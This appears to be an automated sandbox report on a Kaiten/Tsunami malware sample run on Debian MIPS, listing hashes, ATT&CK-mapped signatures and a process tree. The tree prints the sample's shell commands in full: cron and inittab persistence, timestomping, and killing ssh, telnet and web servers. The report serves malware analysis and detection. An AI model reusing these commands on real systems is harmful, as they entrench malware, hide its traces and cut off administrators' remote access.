Analysis
max time kernel: 149s
max time network: 156s
platform: debian-12_mipsel
resource: debian12-mipsel-20240221-en
resource tags: arch:mipsel image:debian12-mipsel-20240221-en kernel:6.1.0-17-4kc-malta locale:en-us os:debian-12-mipsel system
submitted: 27-10-2024 14:48
Static task
static1
Behavioral task
behavioral1
Sample
749eb7fd01d545c73582592fd8a78d632c9f66a57769d13484d1e1599b05a28c
Resource
debian12-mipsel-20240221-en
General
Target: 749eb7fd01d545c73582592fd8a78d632c9f66a57769d13484d1e1599b05a28c
Size: 515KB
MD5: 0a1b377a36e48b5a59d7cc3327c5a2d9
SHA1: 76bc8feded70c1e72b828aed8c9087dcebf97886
SHA256: 749eb7fd01d545c73582592fd8a78d632c9f66a57769d13484d1e1599b05a28c
SHA512: acf3efc430d95eb2fc67e78e8a4fad597b7199e63425d4f4e951ab2d85b5b855cf3963b1d84b855126215745c7c1986c55d397f35f1ba2a109d0e84b76fcadd1
SSDEEP: 12288:IZ/Q8mhPZBXybwIIdQLAxCnNXsUKpH0fyXNGqvZ48B8dfQwD26N:4I8oxBL7+MxGCp5zR468pQe
Malware Config
Signatures
-
Detects Kaiten/Tsunami Payload (1 IoCs)
resource: behavioral1/memory/743-1-0x00400000-0x005777e8-memory.dmp; yara_rule: family_kaiten2
-
Kaiten family
-
Contacts a large (878) amount of remote hosts (1 TTPs)
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping (1 TTPs, 2 IoCs)
Adversaries may attempt to dump credentials to use them in password cracking.
ioc: File opened for reading /etc/shadow; process: sudo
ioc: File opened for reading /etc/shadow; process: sudo
-
Abuse Elevation Control Mechanism: Sudo and Sudo Caching (1 TTPs, 3 IoCs)
Abuse sudo or cached sudo credentials to execute code.
pid 874: sh; pid 882: sudo; pid 875: sudo
-
Creates/modifies Cron job (1 TTPs, 1 IoCs)
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
ioc: File opened for modification /var/spool/cron/crontabs/tmp.8cG5gY; process: crontab
-
Enumerates running processes
Discovers information about currently running processes on the system.
-
Indicator Removal: Timestomp (1 TTPs, 4 IoCs)
Adversaries may remove indicators of compromise from the host to evade detection.
pid 752: touch; pid 796: sh; pid 798: touch; pid 747: sh
-
Reads CPU attributes (1 TTPs, 2 IoCs)
ioc: File opened for reading /sys/devices/system/cpu/online; process: exim4
ioc: File opened for reading /sys/devices/system/cpu/online; process: exim4
-
Reads runtime system information
Processes
- /tmp/749eb7fd01d545c73582592fd8a78d632c9f66a57769d13484d1e1599b05a28c: /tmp/749eb7fd01d545c73582592fd8a78d632c9f66a57769d13484d1e1599b05a28c (PID:743)
  - /bin/sh: sh -c "touch -acmr /bin/ls /tmp/749eb7fd01d545c73582592fd8a78d632c9f66a57769d13484d1e1599b05a28c" (PID:747) [Indicator Removal: Timestomp]
    - /usr/bin/touch: touch -acmr /bin/ls /tmp/749eb7fd01d545c73582592fd8a78d632c9f66a57769d13484d1e1599b05a28c (PID:752) [Indicator Removal: Timestomp]
  - /bin/sh: sh -c "(crontab -l | grep -v \"/tmp/749eb7fd01d545c73582592fd8a78d632c9f66a57769d13484d1e1599b05a28c\" | grep -v \"no cron\" | grep -v \"lesshts/run.sh\" > /var/run/.x00740882966) > /dev/null 2>&1" (PID:757)
    - /usr/bin/grep: grep -v /tmp/749eb7fd01d545c73582592fd8a78d632c9f66a57769d13484d1e1599b05a28c (PID:762)
    - /usr/bin/crontab: crontab -l (PID:761)
    - /usr/bin/grep: grep -v "no cron" (PID:763)
    - /usr/bin/grep: grep -v lesshts/run.sh (PID:764)
  - /bin/sh: sh -c "echo \"* * * * * /tmp/749eb7fd01d545c73582592fd8a78d632c9f66a57769d13484d1e1599b05a28c > /dev/null 2>&1 &\" >> /var/run/.x00740882966" (PID:768)
  - /bin/sh: sh -c "crontab /var/run/.x00740882966" (PID:770)
    - /usr/bin/crontab: crontab /var/run/.x00740882966 (PID:773) [Creates/modifies Cron job]
  - /bin/sh: sh -c "rm -rf /var/run/.x00740882966" (PID:776)
    - /usr/bin/rm: rm -rf /var/run/.x00740882966 (PID:778)
  - /bin/sh: sh -c "cat /etc/inittab | grep -v \"/tmp/749eb7fd01d545c73582592fd8a78d632c9f66a57769d13484d1e1599b05a28c\" > /etc/inittab2" (PID:780)
    - /usr/bin/cat: cat /etc/inittab (PID:782)
    - /usr/bin/grep: grep -v /tmp/749eb7fd01d545c73582592fd8a78d632c9f66a57769d13484d1e1599b05a28c (PID:783)
  - /bin/sh: sh -c "echo \"0:2345:respawn:/tmp/749eb7fd01d545c73582592fd8a78d632c9f66a57769d13484d1e1599b05a28c\" >> /etc/inittab2" (PID:784)
  - /bin/sh: sh -c "cat /etc/inittab2 > /etc/inittab" (PID:786)
    - /usr/bin/cat: cat /etc/inittab2 (PID:788)
  - /bin/sh: sh -c "rm -rf /etc/inittab2" (PID:791)
    - /usr/bin/rm: rm -rf /etc/inittab2 (PID:794)
  - /bin/sh: sh -c "touch -acmr /bin/ls /etc/inittab" (PID:796) [Indicator Removal: Timestomp]
    - /usr/bin/touch: touch -acmr /bin/ls /etc/inittab (PID:798) [Indicator Removal: Timestomp]
  - /bin/sh: sh -c "/bin/uname -n" (PID:801)
    - /bin/uname: /bin/uname -n (PID:803)
  - /bin/sh: sh -c "/bin/uname -n" (PID:804)
    - /bin/uname: /bin/uname -n (PID:805)
  - /bin/sh: sh -c "/bin/uname -n" (PID:806)
    - /bin/uname: /bin/uname -n (PID:808)
  - /bin/sh: sh -c "kill -9 `cat /var/run/httpd.pid` > /dev/null 2>&1 &" (PID:816)
    - /usr/bin/cat: cat /var/run/httpd.pid (PID:819)
  - /bin/sh: sh -c "service httpd stop > /dev/null 2>&1 &" (PID:818)
  - /bin/sh: sh -c "killall -9 mini_httpd > /dev/null 2>&1 &" (PID:821)
  - /bin/sh: sh -c "killall -9 minihttpd > /dev/null 2>&1 &" (PID:823)
  - /bin/sh: sh -c "kill -9 `cat /var/run/thttpd.pid` > /dev/null 2>&1 &" (PID:826)
    - /usr/bin/cat: cat /var/run/thttpd.pid (PID:829)
  - /bin/sh: sh -c "nvram set httpd_enable=0 > /dev/null 2>&1" (PID:828)
  - /bin/sh: sh -c "nvram set http_enable=0 > /dev/null 2>&1" (PID:830)
  - /bin/sh: sh -c "killall -9 httpd > /dev/null 2>&1 &" (PID:832)
  - /bin/sh: sh -c "service telnetd stop > /dev/null 2>&1 &" (PID:837)
  - /bin/sh: sh -c "service sshd stop > /dev/null 2>&1 &" (PID:839)
  - /bin/sh: sh -c "killall -9 telnetd > /dev/null 2>&1 &" (PID:844)
  - /bin/sh: sh -c "killall -9 utelnetd > /dev/null 2>&1 &" (PID:847)
  - /bin/sh: sh -c "killall -9 dropbear > /dev/null 2>&1 &" (PID:851)
  - /bin/sh: sh -c "killall -9 sshd > /dev/null 2>&1 &" (PID:857)
  - /bin/sh: sh -c "killall -9 lighttpd > /dev/null 2>&1 &" (PID:861)
  - /bin/sh: sh -c "export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;( kill -9 `cat /var/run/dropbear.pid` `cat /var/run/sshd.pid` ; killall -9 sshd dropbear ; /etc/init.d/dropbear stop )>/dev/null 2>&1 & " (PID:868)
    - /bin/cat: cat /var/run/dropbear.pid (PID:870)
    - /bin/cat: cat /var/run/sshd.pid (PID:871)
    - /bin/killall: killall -9 sshd dropbear (PID:872) [Reads runtime system information]
  - /bin/sh: sh -c "export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;(service dropbear stop ; sudo service sshd stop ; sudo systemctl stop ssh )>/dev/null 2>&1 & " (PID:874) [Abuse Elevation Control Mechanism: Sudo and Sudo Caching]
    - /sbin/service: service dropbear stop (PID:876)
      - /bin/basename: basename /sbin/service (PID:877)
      - /bin/basename: basename /sbin/service (PID:878)
      - /bin/sed: sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p" (PID:881)
      - /bin/systemctl: systemctl list-unit-files --full "--type=socket" (PID:880)
    - /bin/systemctl: systemctl stop dropbear.service (PID:876) [Reads runtime system information]
    - /bin/sudo: sudo service sshd stop (PID:882) [OS Credential Dumping] [Abuse Elevation Control Mechanism: Sudo and Sudo Caching] [Reads runtime system information]
      - /usr/sbin/sendmail: sendmail -t (PID:885)
        - /usr/sbin/exim4: /usr/sbin/exim4 -Mc 1t53en-0000EH-2M (PID:892) [Reads CPU attributes]
      - /usr/sbin/service: service sshd stop (PID:886)
        - /usr/bin/basename: basename /usr/sbin/service (PID:887)
        - /usr/bin/basename: basename /usr/sbin/service (PID:888)
        - /usr/bin/systemctl: systemctl list-unit-files --full "--type=socket" (PID:890)
        - /usr/bin/sed: sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p" (PID:891)
      - /usr/local/sbin/systemctl: systemctl stop sshd.service (PID:886)
      - /usr/local/bin/systemctl: systemctl stop sshd.service (PID:886)
      - /usr/sbin/systemctl: systemctl stop sshd.service (PID:886)
      - /usr/bin/systemctl: systemctl stop sshd.service (PID:886)
- /usr/sbin/service: service httpd stop (PID:820)
  - /usr/bin/basename: basename /usr/sbin/service (PID:824)
  - /usr/bin/basename: basename /usr/sbin/service (PID:831)
  - /usr/bin/systemctl: systemctl list-unit-files --full "--type=socket" (PID:834)
  - /usr/bin/sed: sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p" (PID:835)
- /usr/bin/killall: killall -9 minihttpd (PID:825) [Reads runtime system information]
- /usr/bin/killall: killall -9 mini_httpd (PID:822) [Reads runtime system information]
- /usr/bin/killall: killall -9 httpd (PID:836) [Reads runtime system information]
- /usr/sbin/service: service telnetd stop (PID:838)
  - /usr/bin/basename: basename /usr/sbin/service (PID:840)
  - /usr/bin/basename: basename /usr/sbin/service (PID:845)
  - /usr/bin/systemctl: systemctl list-unit-files --full "--type=socket" (PID:853)
  - /usr/bin/sed: sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p" (PID:854)
- /usr/sbin/service: service sshd stop (PID:843)
  - /usr/bin/basename: basename /usr/sbin/service (PID:848)
  - /usr/bin/basename: basename /usr/sbin/service (PID:849)
  - /usr/bin/systemctl: systemctl list-unit-files --full "--type=socket" (PID:858)
  - /usr/bin/sed: sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p" (PID:859)
- /usr/bin/killall: killall -9 telnetd (PID:846) [Reads runtime system information]
- /usr/bin/killall: killall -9 utelnetd (PID:850) [Reads runtime system information]
- /usr/bin/killall: killall -9 dropbear (PID:855) [Reads runtime system information]
- /usr/bin/killall: killall -9 sshd (PID:860) [Reads runtime system information]
- /usr/bin/killall: killall -9 lighttpd (PID:862) [Reads runtime system information]
- /usr/local/sbin/systemctl: systemctl stop telnetd.service (PID:838)
- /usr/local/bin/systemctl: systemctl stop telnetd.service (PID:838)
- /usr/sbin/systemctl: systemctl stop telnetd.service (PID:838)
- /usr/bin/systemctl: systemctl stop telnetd.service (PID:838)
- /usr/local/sbin/systemctl: systemctl stop httpd.service (PID:820)
- /usr/local/bin/systemctl: systemctl stop httpd.service (PID:820)
- /usr/sbin/systemctl: systemctl stop httpd.service (PID:820)
- /usr/bin/systemctl: systemctl stop httpd.service (PID:820)
- /usr/local/sbin/systemctl: systemctl stop sshd.service (PID:843)
- /usr/local/bin/systemctl: systemctl stop sshd.service (PID:843)
- /usr/sbin/systemctl: systemctl stop sshd.service (PID:843)
- /usr/bin/systemctl: systemctl stop sshd.service (PID:843)
- /etc/init.d/dropbear: /etc/init.d/dropbear stop (PID:869)
- /bin/sudo: sudo systemctl stop ssh (PID:875) [OS Credential Dumping] [Abuse Elevation Control Mechanism: Sudo and Sudo Caching]
  - /usr/sbin/sendmail: sendmail -t (PID:1027)
    - /usr/sbin/exim4: /usr/sbin/exim4 -Mc 1t53fA-0000GZ-0w (PID:1066) [Reads CPU attributes]
  - /usr/bin/systemctl: systemctl stop ssh (PID:1029)
-
Network
MITRE ATT&CK Enterprise v15
Downloads